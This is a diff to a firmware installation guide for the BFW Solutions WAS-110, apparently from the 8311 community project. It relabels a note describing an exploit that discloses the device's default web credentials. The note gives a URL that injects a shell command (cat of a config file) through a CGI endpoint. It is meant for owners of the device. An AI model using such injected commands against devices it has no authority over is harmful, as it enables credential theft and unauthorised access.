up-n-atom/8311/docs/guides/posts/install-8311-community-firmware-on-the-bfw-solutions-was-110.md

 !!! warning
     Passwords have a maximum length of 16 characters which are not restricted by the web UI.

-??? tip "Exploit to disclose the default web credentials"
+??? bug "Exploit to disclose the default web credentials"

     Navigate to <http://192.168.11.1/cgi-bin/shortcut_telnet.cgi?cat%20%2Fptrom%2Fptconf%2Fparam_ct.xml>